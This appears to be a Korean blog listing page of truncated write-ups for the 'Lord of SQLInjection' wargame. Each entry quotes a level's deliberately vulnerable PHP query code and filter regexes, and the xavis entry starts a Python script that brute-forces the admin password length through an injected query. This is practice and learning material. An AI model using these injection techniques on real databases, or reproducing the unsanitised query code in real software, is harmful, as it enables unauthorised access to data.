Wargame(hacking)/LOS (26) 썸네일형 리스트형 LORD OF SQLINJECTION : red_dragon Write-Up LORD OF SQLINJECTION : green_dragon Write-Up if(preg_match('/prob|_|\.|\'|\"/i', $_GET[id])) exit("No Hack ~_~"); if(preg_match('/prob|_|\.|\'|\"/i', $_GET[pw])) exit("No Hack ~_~"); $query = "select id,pw from prob_green_dragon where id='{$_GET[id]}' and pw='{$_GET[pw]}'"; echo "query : {$query} "; $result = @mysqli_fetch_array(mysqli_query($db,$query)); if($result['id']){ if(preg_match('/prob|_|\.|\'|\"/i', $result['id'])) exit(.. LORD OF SQLINJECTION : evil_wizard Write-Up if(preg_match('/prob|_|\.|proc|union|sleep|benchmark/i', $_GET[order])) exit("No Hack ~_~"); $query = "select id,email,score from prob_evil_wizard where 1 order by {$_GET[order]}"; // same with hell_fire? really? echo "idemailscore"; $rows = mysqli_query($db,$query); while(($result = mysqli_fetch_array($rows))){ if($result['id'] == "admin") $result['email'] = "**************"; echo "{$r.. LORD OF SQLINJECTION : hell_fire Write-Up if(preg_match('/prob|_|\.|proc|union/i', $_GET[order])) exit("No Hack ~_~"); $query = "select id,email,score from prob_hell_fire where 1 order by {$_GET[order]}"; echo "idemailscore"; $rows = mysqli_query($db,$query); while(($result = mysqli_fetch_array($rows))){ if($result['id'] == "admin") $result['email'] = "**************"; echo "{$result[id]}{$result[email]}{$result[score]}"; } ech.. LORD OF SQLINJECTION : dark_eyes Write-Up if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); if(preg_match('/col|if|case|when|sleep|benchmark/i', $_GET[pw])) exit("HeHe"); $query = "select id from prob_dark_eyes where id='admin' and pw='{$_GET[pw]}'"; $result = @mysqli_fetch_array(mysqli_query($db,$query)); if(mysqli_error($db)) exit(); echo "query : {$query} "; $_GET[pw] = addslashes($_GET[pw]); $query = "sele.. LORD OF SQLINJECTION : iron_golem Write-Up if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); if(preg_match('/sleep|benchmark/i', $_GET[pw])) exit("HeHe"); $query = "select id from prob_iron_golem where id='admin' and pw='{$_GET[pw]}'"; $result = @mysqli_fetch_array(mysqli_query($db,$query)); if(mysqli_error($db)) exit(mysqli_error($db)); echo "query : {$query} "; $_GET[pw] = addslashes($_GET[pw]); $query = "sel.. LORD OF SQLINJECTION : dragon Write-Up if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); $query = "select id from prob_dragon where id='guest'# and pw='{$_GET[pw]}'"; echo "query : {$query} "; $result = @mysqli_fetch_array(mysqli_query($db,$query)); if($result['id']) echo "Hello {$result[id]}"; if($result['id'] == 'admin') solve("dragon"); 해당 challenge에 해당하는 필터링 조건 및 pass 조건은 위와 같다. 눈에 띄는 점은 query에 #이 들어가 있.. LORD OF SQLINJECTION : xavis Write-Up 첫번째 시도 ( Fail ) import requests import string url="https://los.rubiya.kr/chall/xavis_04f071ecdadb4296361d2101e4a2c390.php?pw='or id='admin'%26%26length(pw)= " cookies ={'PHPSESSID':"p0cct2pi257sma3qvmjcgbv5cb"} for i in range(100): param=str(i)+"%23" URL = url+param print(URL) response = requests.get(URL, cookies=cookies) if "Hello admin" in response.text: print(i) break id가 admin일 경우 p.. 이전 1 2 3 4 다음
